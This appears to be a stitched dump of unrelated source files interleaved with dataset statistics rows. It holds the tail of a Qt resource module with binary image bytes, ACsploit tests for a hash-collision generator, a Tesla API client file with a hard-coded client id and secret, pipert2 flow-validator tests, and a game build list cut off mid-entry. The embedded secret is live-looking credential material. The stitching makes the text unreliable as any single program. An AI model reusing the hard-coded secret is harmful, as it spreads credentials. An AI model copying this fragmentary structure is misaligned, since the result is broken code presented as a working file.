xa5\x1c\xbc\x90\x01\xce\xceM|\xf9\xc9\x97\xee\x1a\x0a\xf5\xc6\xb6E\xd7\xa1\xa5\xe2\xe0\xc6\xef\x8c\xb3\x85<}\xcd\xbbO?\xbf\xb5\xa5\xa1\x9e'_\xff\x15s\xda\xe6\xe0\xaa<hA\xc2N\xd1\xde0\x89\xf6\xfaI8V\x12\x84M\xe9\xb3_\xe4\xb5{\x1fF_q-KN8\x0d\xc7\x84t6\xb5\x22\x8c\x8d\xb2\x02\xd2)X\xbf\xfc\x02\x82\x07~Lg\xa6\x0e\xaf\xb9\x13d\x80@\xc4#`\xe2_gY\xbe'\xf0!\xf00\xbe\x07*\xa4z\xdf\xeb<\xf4\xec\xde\xed?\xd8gn\x99\xfa\xce[\xcc\xe4%7\x11z\xc1\x88\x80\xef\x02f\xac\x00\x8cI\xd7\xa4\x9b\xaeX1{!o\x0c\xee\xc2\xd5\x05&\xd651\xe4\x1f!a\xa5H\x98$\x9epI\x08\x07K;\xd8\xc2&Y\x9b\xc6\xb9\xefG\xd4v\x8d\xb6H\x01OK\xb4Qh\xa1q\x84\xcb\xba\x0dG\xb8s\xfd\x09,\xec\xe9\xe2\xca\x87o\xa3i\xd9q\x84\xd3fcT\x1c\xb41\xa3>\x22\x0c\xa3\x9d\xafC,\xb7Hz\xdb\xabl\x1ch\xe3\xd1\x95\xf7N\x99\xdd\x99\xffBmc\xd7gTq\xc0S~\x00\x08Ru\xed\xf8\xc3\xbd\x15\x01\xb8\xfa\x94Y\xd3\xa6\xcdjn\xa8a\xe7\xa1\xad4e&P\x94y,l\x12\xc6\xc7\xd1\x09l\x91\x1c!\x0a\xde\x1aE\xe6hZ:\x03#%C\xc1\x00\xf1\x08\xe28>\x0f\xfe\xf2\x08\x8f\xbdr\x0cW\x9e3\x91\xb5OH~\xb5\xf03\xac\xc9\xfe\x18g\xdb#$fv\x1364\xa3\x84\x83\xd1\x0a\xa4,\xb7K\xd2\x1d\xc6\xee\xef\xc5\xdf\x7f\x98\x8d\xc7\x9c\xc1-\x853X\xd2lW-\xbe\xb8\xeb\xfa\xbb\x1e\xcd\xce\x0d\x95\xb9DXN\x16\xc0rjHf&W\x04\xe0[+{&\xb5YE\x95#\x17\x0c0\xa9\xae\x8d|\x98\xc5\x11)\x12V\x12G$\xb0G\xb1\x1clF\x05X\x08F(\x0e\xc7\xc38\x8a!\x99\x0cY\xfb\xd4a\x1e{~\x0e\xb7_7\x99-[\x0eSO\x81\x96\xf9=\x0c\xce\xfa<C\xeb\x9e'\xfb\x8b'iV\xaf3\xb1\xceP\x95r@+\x8a\xc5\x80\x1d\x83\x09\x0a\x9d\xc7q\xf0\xec\x1b\xd8\xd38\x8d\xa5-!}\xbf\xdd\xc6\xb9'\xa5\xe9\xbe\xbc\xf6\xf4\x9b\xee\x1czpxh\xefj0\xae\x9b\xddF\xf79wU\x04\xa0\x13\xc77\xd5Ws\xd8\xed\xc7\xb2!4\x1eR\x86\xe5\xe0\x13:\x85c%p\xe2\xf6\xb1\x88+ De\xa5\x18\x83\x93\x84\xdfm>\xc4}\xbf\x9c\xc9\xd7\xae\x9bB\x8d\x13\xb0c\xd7\x107}\xa4\x9b\x0d;4\xf9A\x8b\xfe\xee\xa5<\xbbl)\x0d\x89\xc3l\xd8\xf4:I\xaf\x80\xc1\x22\x9f\xa9g\xf6\xe2\xd9PSO\xebD\x90}\x9a\xe5\xc7&\xa8\x9a3\x9d\xe7\xd6\xf5\xf2\xe1\xcb\x8f\xe1\x93\x974.\xff\xcb[\x9e\xfc6p5\xd8\xf4\xbd\xfcM\xe0}\xc4\x02\x9c\xb6d\xd2\x90\xf5\x0e\xe18\xd5\x14\xe4P9\xe3\x09\x9d,\x0fm\xd4B\xce(Q\xf0X\x081\x02\x91\x09K\x10\x0e\xe7\xb8\xfb\x81\x06\xce\x7f\xc7\x0cfO\x85\x1f\xfd\xfc\x10g\xbc\xb3\x9d\xfaj\xc1\xe2\x99\x82\xad{\x15\xa1\x0f\xab\xe6\xdbTWOdB\xd7D~\xbd\xcbC\x1b\xc3\xaa\xe9i\x16\xb5\xc2\x9b\x87\xe0w\x074K;\x0c\x0b\xa6A\xd2\xa9\xa6\xaf?\xc33\x1b\x06\xb9pY#\xcf]\xf8\xae\xab\xee\xd8\xbc\xfa\xd1\xa0\xff\xd1\x07J\x876U>\xa7\x91\xb6\xe3J\x97\xa2\x1aF\x8b\x90\x82\xccQ\x92\xc3\xe5\xe7\xa2\x1c%GLY\x5ca\xf4\x1c\xf92\x1eY~\xbdn\x08%g\xb3\xea\xb4\x14/ns\xb1S\x09\xda;\xaa\x19\xf2\xc0I\xc0\x9c.\x9bi\xcd\x82\x99m0\xa5\x01\xce=\x06\xae\x5cP\xc5{\x17\xa49\xaf\x1b:\xeaa\xfe\x14\xb8h\x0e\x9c<\xdb\x06\x01\x85\x00N<a\x22\xdb\xf6\xba\x1c\x186\x5czf\x0d\xddK?~+VU\xcd\xd8-\xe4Y\x85#\xb9A\xa6\x08\x07O\x17Q&\x8c3\x1f\xf5\xbfS\xee}\x07K\x8cb\x11W\x00\x00\xcb\xb2\x08s\xc3<\xfb\x5c\x17g\xbec2\xca\x82\xcd\xbb\x8a,\x9c\xd3\xc4`\x09l P\x90\xb4aR\x8b\x850`\x09H:\xb0\xb0\x0d\x0c\x90\xb4@\x19hL@C\x8d\xc5\xb0\x0f\xa1\x8a\xb0\x1cA{G\x86\x97\xb6\x16\x98?7\xc3\xa9\xa7-\xea\xd9\xb1n\xf9%\xe1\xa1\xc7\xee\xaeT \xb0\xb7\xee\xeb\x1dB\x0a\x97J\xe6s\x11*\xcarA\x8d\x9e\x87\xa2*\x94\xef\xa2\xb3k\x06\xd9\xbec\x88Bn*\xb3fU\xb1\xabW\x96\xb3\x9f\xaeq\x18v\xa1\x10D\xe4}\xca\x82r>\x0c\xfb\x91w%x\xb2r7\xe4B\xd6\x85\xbc\x1fe\xbf\x18B\xb6\x08m\xed\xb5\x1c\x18\x0c\x19(\xc2\xfcy\x19\x1a;\xcfz\x0f *\x150\xf6\xa3;\xb6\x14\xdf;\xbc\xb2@\xcaV\xd8:\x11U@\x8c\xa0\x9d\xa3\xfa?\xdeB aI\xb6\xbeV\xc5\x84\xc6VR\x19\xd8\xb5\xd3\xa7\xb5\xb9\x9a\x9c\x07\x8e\x80\x84\x02\xc7\x06\xc7\x8a\x9em+\xaa\x80\x00\xc4\x98\xcf\x0a\xd0\x06\xd4(\x1a\xa4\x01\xa9 \xd4`\x84 ]\x9b\xe2\x8d\xbe\x90\x96I\x09Z;\x8f;\xf1\xd0\xc6\xba.`w$\xc0r~\x91}S\xffn\xfd\xf3\x83\xf3\x16\x9f\x1e\xe2\xb9\x09\x1c\x9d\x88\x04\x881\x02*+\x14\x81\xb0,,]\xa2ww\x0f\x1d-\x19\x86\xbd(k\x89t\xa2|N\xda\x90\xb0\xc0\x89\xb1\xad\x8a\x00\x8b\xca\x975T\x04\xe8\xb7\x04\xc4\x84:\x12U[WE\xdf@\xc0\x94\xce\x04\x13&\xb64\x88T\xc7\xbc\x8a\x00C\x09\xecO>\xf7\x90\xfbx\xbaN\x8b\x99'$\xf0\x82\x04BF\xdb\xc7\xb1\x1c,\xa2\x1f1Q\x9e\x01\x01\x8cxK\xa0\xc2\x22\xb9\x81$=\xd3\x13\x1c\x1e\x06+\x99\xc0S\x10\x8c\xa2\x19+@\x94\x89* \xa0R\x80\xa3\x05(S\x11\x10*0\x8e\x8d\xafE\xb9\xd5\xd2\xb5i,\xa7i\xfa\xd8o!!\x9e\x90Eq\xd5\xbf\xdd!\xbf\xdd\xbf\x92\x9ay\xa7J\xea\x9a<\x8ce#\xb5\x8d\x18\xc5\xd8X\xfa\xad\xf6\x11XX\xc8\xb0\x80W\x02i\x04C\xae\xa1*\xe10\xec\xc7\xedc\x8d`\xc7\xc1\x8f' \xc6\x18\xd0\x8c\x11pT\x15\x8c\xed0\xe8Fk\x1b\xe3\xd4U\x048\x16\x84\x80%\xee\xd1o\x1czu\xe3\x0f\xd3\xb7\xbc\xf6T\xdd9\x1ds\x13\xce\xe4\x19\x8a\x09m\x8a\x9azH\xa5\xc1I\x08l[ F\x05\xd8 u\x09)]\x8a%II\x0a\xec\x84\xa0\xe0\xc7\x99\xb7!\xa1\xc6\x0a\xb0\xc4\x98\x198Z\x80\x8eD\xc8J+\x11\xc6^\xdb69\x17J\x05\x1f\xa3$\x95-\xd4\x97\xab\xbc\xcd\xf77\xb1{\xf7\x05\xfe\xbam\x8bw\xdd\xb3\xe7s\xcf\xddzx\xed\xcf?\x97\x7f\xfd\xfe\xcfz\xd9\xfb\xfe:\xf4\xee\xbb94\xf7}!\xe4\xbe/\x05\xdc\xff\xe5\x80\x07\xbf*\xd9\xbf{\x90\xec\x91\x22\xa1\x80\x92\x84B\x18Q\x0c\xa00>\xe4\xdf\xc2\x8f|\xc1\x8f\xef\xc7\xf9[_G\xc9\xc9\xf6\x0f\x83.\x0eU*\xb0\xb1\x17N\xcd\x80\x95\xac\x08\x09\xbc\x8der@\x1f\x19\x89\xd5,\x85\xdd\x08\x22\x83eW#D\x02c@h\xdf\xc9\x0c\x9d\xde\xbb\xad\xff\xc6\xd9\xe1\x14\x14\x95\xac\xc7\xfd\x8f=N\x05\xc6\xce@\x5c\x85\x98\xb8\x85P\x95\x0a\xa0\x04d\x07\x02\x0e\xec\xda+\x8d\xec\xdd>v\x06\x9e\xdf\x0e\x0bz*\x02\xc6\x92\x07\x9d\xc7\xe8\xdd\x00(\xc6Xu\xed\xd9\xaf\xf4m~\xe3C\xfbw\xce\xack\xebi\xc0\x0f8z\xfb\x1c\xb5B\xc7\x0a \xee\x7f\x13\x05_Y\xa7\x15\x10i\xd8\xf9b\x1f\xb9\xde\xf5\xaf\x1buxS\xa5\x85\x00\xa4\x82\xf5\xdb\xc0\xf5y\xfb&\x06\x82\xbc\xfb\x8f/\xdf\xfb\x02Cy\x8d+\xa2\x92\xc7\x8cm\x97\xa3Z(>\x8f\xdb>Q;\xfa\x09\xd8\xf3\xda0\x9b\x1e\xde\x80,\xfe\xeb\xdd`\xfa\xc7V N\x01\xb9\x02o\xdf\x0c\x96\xc5\x97\xfb_}s\xd13\xb7=\xber\xe1\xfbO\xa5\xa1\xb3\x96P\x82\x90`\x13\xb7\xcf8C\x1c\xb7O\xbcJ+(\x00'\xf2\xfb_<\xc8+\xdf\x7f\x81|\xef=\xf7k\xb9\xf9.bs\xf8SMd@8\x00\xae\x9d\xb0.\xe8{i\xe7m\xd9\x1d\xfd\x1f\x9cv\xfa\xf1v\xe7\x92\xe9\xd4u4\x90\xac\x16\xd8\x0eX\x95\xd6\x89\x01C\xc5\x0c\xa0c12\x047\x17\x92\xdd5\xc0\x9bO\xefd\xdf\xf3\xaf\xb8\xd2{\xe4N\xcc3_\x02\xb2\xff}\x02\x8c\x87\x91\x03@\x0a\xa0d'\xed\x8fzC\xc5;\xb7\xdc\xf7\xdd\xab\xb7>\xd4yV\xa6\xad\xab+\xd3\xdef\xd7\xb66P\xd5XC\xb2&\x85\x9d\xb2\xb1\x13N\xa5\x02\x1aT\x10\x22}\x89\x9f\xf7p\x07\x0a\xe4\x0f\x0c\x90\xef\xdd\x1f\x16\x0f\xedz\x136=\x03/\xff\x04\x86F<\x0a\xe0\xbfO\x00!\x85\x03\x9f&=\xe1[\xc4\x86e[\xeb\x8d\xfc\xcdz\x1d\xee\xab\xc9\xed\xcd\x1c\x9b\xdb\xdb4\x17\x9a\xa6Cz2d\x1a\xa1\xaa\x1a,\x07\xec*\x00\x90\x1eh\x09\xa5\x12\x14s0|\x00\x06w\xc3\xe1\xed\x90\xdd\x0a\x1cd\x1c\xfb\xff\xffV\xf9\xbf\xb6\x7f\x07=;\xcc\xf1\xa3\xb2\xb6G\x00\x00\x00\x00IEND\xaeB`\x82"
qt_resource_name = b"\x00\x06\x07\x03}\xc3\x00i\x00m\x00a\x00g\x00e\x00s\x00\x13\x015z\xc7\x00k\x00o\x00p\x00e\x00t\x00e\x00a\x00v\x00a\x00i\x00l\x00a\x00b\x00l\x00e\x00.\x00p\x00n\x00g\x00\x0d\x0e@@\xc7\x00m\x00i\x00n\x00i\x00t\x00o\x00o\x00l\x00s\x00.\x00p\x00n\x00g\x00\x10\x05\xe9\x01g\x00a\x00r\x00t\x00s\x00f\x00f\x00t\x00s\x00c\x00o\x00p\x00e\x00.\x00p\x00n\x00g\x00\x16\x07\xbc\x11\xc7\x00m\x00e\x00t\x00a\x00c\x00o\x00n\x00t\x00a\x00c\x00t\x00_\x00o\x00n\x00l\x00i\x00n\x00e\x00.\x00p\x00n\x00g\x00\x14\x0a4\xf1\x07\x00b\x00l\x00u\x00e\x00_\x00a\x00n\x00g\x00l\x00e\x00_\x00s\x00w\x00i\x00r\x00l\x00.\x00j\x00p\x00g\x00\x10\x03\x16\x82G\x00k\x00o\x00n\x00t\x00a\x00c\x00t\x00_\x00m\x00a\x00i\x00l\x00.\x00p\x00n\x00g\x00\x13\x09+\x13G\x00k\x00o\x00n\x00t\x00a\x00c\x00t\x00_\x00j\x00o\x00u\x00r\x00n\x00a\x00l\x00.\x00p\x00n\x00g\x00\x11\x04[\x0b\x07\x00k\x00o\x00n\x00t\x00a\x00c\x00t\x00_\x00n\x00o\x00t\x00e\x00s\x00.\x00p\x00n\x00g\x00\x14\x08\x130\x07\x00k\x00o\x00n\x00t\x00a\x00c\x00t\x00_\x00c\x00o\x00n\x00t\x00a\x00c\x00t\x00s\x00.\x00p\x00n\x00g"
qt_resource_struct = b"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x02\x00\x00\x00\x0a\x00\x00\x00\x02\x00\x00\x00\x12\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xe4\x00\x00\x00\x00\x00\x01\x00\x00|\xee\x00\x00\x016\x00\x00\x00\x00\x00\x01\x00\x00\x965\x00\x00\x00^\x00\x00\x00\x00\x00\x01\x00\x00\x11{\x00\x00\x00\x84\x00\x00\x00\x00\x00\x01\x00\x00\x16\x8d\x00\x00\x01^\x00\x00\x00\x00\x00\x01\x00\x00\xa5n\x00\x00\x01\x0a\x00\x00\x00\x00\x00\x01\x00\x00\x89t\x00\x00\x00\xb6\x00\x00\x00\x00\x00\x01\x00\x00N\xb8\x00\x00\x00\xb6\x00\x00\x00\x00\x00\x01\x00\x00 \x82\x00\x00\x00>\x00\x00\x00\x00\x00\x01\x00\x00\x09P"
def qInitResources():
QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| 6,309.772727 | 136,602 | 0.742189 | 31,698 | 138,815 | 3.245063 | 0.143795 | 0.012891 | 0.010237 | 0.010966 | 0.514592 | 0.514408 | 0.512629 | 0.511822 | 0.507904 | 0.506339 | 0 | 0.248529 | 0.002305 | 138,815 | 21 | 136,603 | 6,610.238095 | 0.494184 | 0.001311 | 0 | 0 | 0 | 0.333333 | 0.997367 | 0.994871 | 0 | 0 | 0.000058 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.111111 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7ab17a9a94beacc48676c15727820f9a783a2a8b | 4,635 | py | Python | test/exploits/hashes/collisions/test_custom_hash.py | drjerry/acsploit | fbe07fb0eb651e3c5fc27a0dbdfcd0ec4c674381 | [
"BSD-3-Clause"
] | 107 | 2018-05-03T16:53:01.000Z | 2022-02-23T14:47:20.000Z | test/exploits/hashes/collisions/test_custom_hash.py | drjerry/acsploit | fbe07fb0eb651e3c5fc27a0dbdfcd0ec4c674381 | [
"BSD-3-Clause"
] | 7 | 2019-04-28T00:41:35.000Z | 2021-05-04T20:35:54.000Z | test/exploits/hashes/collisions/test_custom_hash.py | drjerry/acsploit | fbe07fb0eb651e3c5fc27a0dbdfcd0ec4c674381 | [
"BSD-3-Clause"
] | 16 | 2019-03-29T12:39:16.000Z | 2021-03-03T11:09:45.000Z | import pytest
from exploits.hashes.collisions import custom_hash
from test.exploits.dummy_output import DummyOutput
def truncate_32(x):
return x & 0xFFFFFFFF
def hash_function(x, y, z):
return truncate_32(truncate_32(x * y) + z)
def test_custom_hash():
output = DummyOutput()
n_collisions = 10
image = 0
custom_hash.options['n_collisions'] = n_collisions
custom_hash.options['variable_width'] = 32
custom_hash.options['target_type'] = 'image'
custom_hash.options['image'] = image
custom_hash.options['hash'] = '+ * x y z'
custom_hash.run(output)
assert len(output) == n_collisions
for i in output:
assert hash_function(int(i[i[2]].as_long()),
int(i[i[1]].as_long()),
int(i[i[0]].as_long())) == image
def test_custom_hash_preimage():
output = DummyOutput()
n_collisions = 10
preimage = 'x = 5, y = 10, z = 30'
image = 80
custom_hash.options['n_collisions'] = n_collisions
custom_hash.options['variable_width'] = 32
custom_hash.options['target_type'] = 'preimage'
custom_hash.options['preimage'] = preimage
custom_hash.options['hash'] = '+ * x y z'
custom_hash.run(output)
assert len(output) == n_collisions
for i in output:
assert hash_function(int(i[i[2]].as_long()),
int(i[i[1]].as_long()),
int(i[i[0]].as_long())) == image
def test_custom_hash_malformed_hash():
output = DummyOutput()
n_collisions = 10
image = 0
custom_hash.options['n_collisions'] = n_collisions
custom_hash.options['variable_width'] = 32
custom_hash.options['target_type'] = 'image'
custom_hash.options['image'] = image
custom_hash.options['hash'] = '+ * x y z q'
with pytest.raises(AssertionError):
custom_hash.run(output)
def test_custom_hash_unknown_variable():
output = DummyOutput()
n_collisions = 10
preimage = 'x = 5, y = 10, z = 30'
custom_hash.options['n_collisions'] = n_collisions
custom_hash.options['variable_width'] = 32
custom_hash.options['target_type'] = 'preimage'
custom_hash.options['preimage'] = preimage
custom_hash.options['hash'] = '+ * x y q'
with pytest.raises(ValueError):
custom_hash.run(output)
def test_custom_hash_missing_preimage_variable():
output = DummyOutput()
n_collisions = 10
preimage = 'x = 5, y = 10'
custom_hash.options['n_collisions'] = n_collisions
custom_hash.options['variable_width'] = 32
custom_hash.options['target_type'] = 'preimage'
custom_hash.options['preimage'] = preimage
custom_hash.options['hash'] = '+ * x y z'
with pytest.raises(ValueError):
custom_hash.run(output)
def test_custom_hash_preimage_parsing_error_missing_comma():
output = DummyOutput()
n_collisions = 10
preimage = 'x = 5 y = 10, z = 30'
custom_hash.options['n_collisions'] = n_collisions
custom_hash.options['variable_width'] = 32
custom_hash.options['target_type'] = 'preimage'
custom_hash.options['preimage'] = preimage
custom_hash.options['hash'] = '+ * x y z'
with pytest.raises(ValueError):
custom_hash.run(output)
def test_custom_hash_preimage_parsing_error_equals():
output = DummyOutput()
n_collisions = 10
preimage = 'x 5, y = 10, z = 30'
custom_hash.options['n_collisions'] = n_collisions
custom_hash.options['variable_width'] = 32
custom_hash.options['target_type'] = 'preimage'
custom_hash.options['preimage'] = preimage
custom_hash.options['hash'] = '+ * x y z'
with pytest.raises(ValueError):
custom_hash.run(output)
def test_custom_hash_preimage_parsing_error_multiple_assignments():
output = DummyOutput()
n_collisions = 10
preimage = 'x = 5, x = 10, z = 30'
custom_hash.options['n_collisions'] = n_collisions
custom_hash.options['variable_width'] = 32
custom_hash.options['target_type'] = 'preimage'
custom_hash.options['preimage'] = preimage
custom_hash.options['hash'] = '+ * x y z'
with pytest.raises(ValueError):
custom_hash.run(output)
def test_custom_hash_preimage_parsing_error_non_integer():
output = DummyOutput()
n_collisions = 10
preimage = 'x = 5.5, y = 10, z = 30'
custom_hash.options['n_collisions'] = n_collisions
custom_hash.options['variable_width'] = 32
custom_hash.options['target_type'] = 'preimage'
custom_hash.options['preimage'] = preimage
custom_hash.options['hash'] = '+ * x y z'
with pytest.raises(ValueError):
custom_hash.run(output)
| 33.586957 | 67 | 0.663862 | 605 | 4,635 | 4.821488 | 0.100826 | 0.219404 | 0.262256 | 0.119986 | 0.894069 | 0.891327 | 0.891327 | 0.891327 | 0.85156 | 0.85156 | 0 | 0.023706 | 0.208198 | 4,635 | 137 | 68 | 33.832117 | 0.771117 | 0 | 0 | 0.782609 | 0 | 0 | 0.155771 | 0 | 0 | 0 | 0.002158 | 0 | 0.043478 | 1 | 0.095652 | false | 0 | 0.026087 | 0.017391 | 0.13913 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
8fd10eaf8af781f615084d37f3d19fe12a43c165 | 271 | py | Python | tesla_client.py | benderl/testatus | 82c40cff55969e9944be7150fb903edb788bd7a6 | [
"MIT"
] | 9 | 2019-02-26T03:57:23.000Z | 2020-11-12T07:25:30.000Z | tesla_client.py | benderl/testatus | 82c40cff55969e9944be7150fb903edb788bd7a6 | [
"MIT"
] | 5 | 2019-02-24T03:55:49.000Z | 2021-07-10T14:41:27.000Z | tesla_client.py | benderl/testatus | 82c40cff55969e9944be7150fb903edb788bd7a6 | [
"MIT"
] | 1 | 2019-01-30T21:32:47.000Z | 2019-01-30T21:32:47.000Z | class Tesla_Client(object):
base_info = {"v1": {"id": "81527cff06843c8634fdc09e8ac0abefb46ac849f38fe1e431c2ef2106796384", "secret": "c7257eb71a564034f9419ee651c7d0e5f7aa6bfbd18bafb5c5c033b093bb2fa3", "baseurl": "https://owner-api.teslamotors.com", "api": "/api/1/"}}
| 90.333333 | 242 | 0.778598 | 20 | 271 | 10.45 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.307087 | 0.062731 | 271 | 2 | 243 | 135.5 | 0.515748 | 0 | 0 | 0 | 0 | 0 | 0.693727 | 0.472325 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
8feb349b496d7dcb8ec97c657073c11ee187c353 | 5,149 | py | Python | tests/unit/pipert/core/base/validators/test_flow_validator.py | MayoG/PipeRT2 | 357bf8a5fd3f3fe2149b7b0317d2c39dde66561d | [
"MIT"
] | 1 | 2021-11-23T17:20:11.000Z | 2021-11-23T17:20:11.000Z | tests/unit/pipert/core/base/validators/test_flow_validator.py | MayoG/PipeRT2 | 357bf8a5fd3f3fe2149b7b0317d2c39dde66561d | [
"MIT"
] | 124 | 2021-05-10T06:35:48.000Z | 2022-03-10T09:25:27.000Z | tests/unit/pipert/core/base/validators/test_flow_validator.py | MayoG/PipeRT2 | 357bf8a5fd3f3fe2149b7b0317d2c39dde66561d | [
"MIT"
] | 4 | 2021-09-12T08:10:10.000Z | 2021-11-29T12:10:20.000Z | import pytest
from pipert2 import Wire
from pytest_mock import MockerFixture
from pipert2.core.base.validators import flow_validator
from pipert2.utils.exceptions import FloatingRoutine, UniqueRoutineName
def test_validate_flow(mocker: MockerFixture):
dummy_routine1 = mocker.MagicMock()
dummy_routine1.name = "routine1"
dummy_flow1 = mocker.MagicMock()
dummy_flow1.name = "flow1"
dummy_flow1.routines = {dummy_routine1.name: dummy_routine1}
dummy_routine2 = mocker.MagicMock()
dummy_routine2.name = "routine2"
dummy_flow2 = mocker.MagicMock()
dummy_flow2.name = "flow2"
dummy_flow2.routines = {dummy_routine2.name: dummy_routine2}
dummy_wires = {
(dummy_flow1.name, dummy_routine1.name): Wire(source=dummy_routine1, destinations=(dummy_routine2,))
}
flows = {
dummy_flow1.name: dummy_flow1,
dummy_flow2.name: dummy_flow2
}
flow_validator.validate_flow(flows=flows, wires=dummy_wires)
def test_validate_flows_routines_are_linked_with_valid_flow(mocker: MockerFixture):
dummy_routine1 = mocker.MagicMock()
dummy_routine1.name = "r1"
dummy_routine2 = mocker.MagicMock()
dummy_routine2.name = "r2"
dummy_flow1 = mocker.MagicMock()
dummy_flow1.name = "flow1"
dummy_flow1.routines = {dummy_routine1.name: dummy_routine1,
dummy_routine2.name: dummy_routine2}
dummy_routine3 = mocker.MagicMock()
dummy_routine3.name = "r3"
dummy_routine4 = mocker.MagicMock()
dummy_routine4.name = "r4"
dummy_routine5 = mocker.MagicMock()
dummy_routine5.name = "r5"
dummy_flow2 = mocker.MagicMock()
dummy_flow2.name = "flow2"
dummy_flow2.routines = {dummy_routine3.name: dummy_routine3,
dummy_routine4.name: dummy_routine4,
dummy_routine5.name: dummy_routine5}
flows = {"flow1": dummy_flow1, "flow2": dummy_flow2}
wires = {
("flow1", "r1"): Wire(source=dummy_routine1, destinations=(dummy_routine2, dummy_routine3,)),
("flow_2", "r3"): Wire(source=dummy_routine3, destinations=(dummy_routine4, dummy_routine5)),
}
flow_validator.validate_flows_routines_are_linked(flows, wires)
def test_validate_routines_unique_names(mocker: MockerFixture):
dummy_routine1 = mocker.MagicMock()
dummy_routine1.name = "r1"
dummy_flow1 = mocker.MagicMock()
dummy_flow1.name = "flow1"
dummy_flow1.routines = {dummy_routine1.name: dummy_routine1}
dummy_routine3 = mocker.MagicMock()
dummy_routine3.name = "r3"
dummy_routine4 = mocker.MagicMock()
dummy_routine4.name = "r4"
dummy_flow2 = mocker.MagicMock()
dummy_flow2.name = "flow2"
dummy_flow2.routines = {
dummy_routine3.name: dummy_routine3,
dummy_routine4.name: dummy_routine4
}
flows = {"flow1": dummy_flow1, "flow2": dummy_flow2}
flow_validator.validate_routines_unique_names(flows)
def test_validate_routines_unique_names_existing_names(mocker: MockerFixture):
dummy_routine1 = mocker.MagicMock()
dummy_routine1.name = "r1"
dummy_flow1 = mocker.MagicMock()
dummy_flow1.name = "flow1"
dummy_flow1.routines = {dummy_routine1.name: dummy_routine1}
dummy_routine3 = mocker.MagicMock()
dummy_routine3.name = "r1"
dummy_routine4 = mocker.MagicMock()
dummy_routine4.name = "r4"
dummy_flow2 = mocker.MagicMock()
dummy_flow2.name = "flow2"
dummy_flow2.routines = {
dummy_routine3.name: dummy_routine3,
dummy_routine4.name: dummy_routine4
}
flows = {"flow1": dummy_flow1, "flow2": dummy_flow2}
with pytest.raises(UniqueRoutineName) as error:
flow_validator.validate_routines_unique_names(flows)
assert "r1" in str(error)
def test_validate_flows_routines_are_linked_floating_routine_build_raises_error(mocker: MockerFixture):
dummy_routine1 = mocker.MagicMock()
dummy_routine1.name = "r1"
dummy_routine2 = mocker.MagicMock()
dummy_routine2.name = "r2"
dummy_flow1 = mocker.MagicMock()
dummy_flow1.name = "flow1"
dummy_flow1.routines = {dummy_routine1.name: dummy_routine1,
dummy_routine2.name: dummy_routine2}
dummy_routine3 = mocker.MagicMock()
dummy_routine3.name = "r3"
dummy_routine4 = mocker.MagicMock()
dummy_routine4.name = "r4"
dummy_routine5 = mocker.MagicMock()
dummy_routine5.name = "r5"
dummy_flow2 = mocker.MagicMock()
dummy_flow2.name = "flow2"
dummy_flow2.routines = {dummy_routine3.name: dummy_routine3,
dummy_routine4.name: dummy_routine4,
dummy_routine5.name: dummy_routine5}
flows = {"flow1": dummy_flow1, "flow2": dummy_flow2}
wires = {
("flow1", "r1"): Wire(source=dummy_routine1, destinations=(dummy_routine2, dummy_routine3,)),
("flow_2", "r3"): Wire(source=dummy_routine3, destinations=(dummy_routine4,)),
}
with pytest.raises(FloatingRoutine) as error:
flow_validator.validate_flows_routines_are_linked(flows=flows, wires=wires)
assert "r5" in str(error)
| 31.206061 | 108 | 0.702078 | 585 | 5,149 | 5.863248 | 0.097436 | 0.122449 | 0.163265 | 0.046647 | 0.854227 | 0.841108 | 0.813994 | 0.742857 | 0.714869 | 0.714869 | 0 | 0.04312 | 0.198291 | 5,149 | 164 | 109 | 31.396341 | 0.787791 | 0 | 0 | 0.706897 | 0 | 0 | 0.033405 | 0 | 0 | 0 | 0 | 0 | 0.017241 | 1 | 0.043103 | false | 0 | 0.043103 | 0 | 0.086207 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
890dec6a0b10256a91dc09d6fda776caebc50d60 | 33,541 | py | Python | build_cp.py | SamCHogg/GlossyMudcrab | a669bd00a9d61e3da69d4f0e132470c67fcb321f | [
"MIT"
] | null | null | null | build_cp.py | SamCHogg/GlossyMudcrab | a669bd00a9d61e3da69d4f0e132470c67fcb321f | [
"MIT"
] | null | null | null | build_cp.py | SamCHogg/GlossyMudcrab | a669bd00a9d61e3da69d4f0e132470c67fcb321f | [
"MIT"
] | 1 | 2021-05-06T00:48:03.000Z | 2021-05-06T00:48:03.000Z | builds = [
{
"display_name": "Magicka Nightblade",
"names": ["magblade", "magicka nightblade"],
"builds": [
{
"name": "Magicka Nightblade",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "61",
},
{
"name": "Spell Erosion",
"value": "1",
},
{
"name": "Master at Arms",
